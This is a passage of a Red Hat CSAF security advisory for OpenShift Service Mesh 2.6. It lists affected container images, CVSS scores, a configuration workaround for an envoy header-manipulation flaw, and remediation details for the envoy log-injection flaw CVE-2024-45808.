"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Potential to manipulate `x-envoy` headers from external sources"
},
{
"cve": "CVE-2024-45808",
"cwe": {
"id": "CWE-117",
"name": "Improper Output Neutralization for Logs"
},
"discovery_date": "2024-09-20T00:40:26.266584+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313685"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in envoy. Affected versions of envoy may allow malicious attackers to inject unexpected content into access logs. This is achieved by exploiting the lack of validation for the `REQUESTED_SERVER_NAME` field for access loggers.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Malicious log injection via access logs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in Envoy that allows attackers to inject unexpected content into access logs is classified as moderate severity rather than important because the impact is primarily related to log integrity rather than direct exploitation of the system or data breaches, which lowers the overall risk profile. While log tampering can lead to misleading information, it does not directly compromise the application\u2019s functionality or security boundaries. Additionally, the attack requires specific conditions to succeed, relying on the lack of validation for the `REQUESTED_SERVER_NAME` field, which may not be present in all configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45808"
},
{
"category": "external",
"summary": "RHBZ#2313685",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313685"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45808"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45808",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45808"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc"
}
],
"release_date": "2024-09-20T00:15:02.733000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
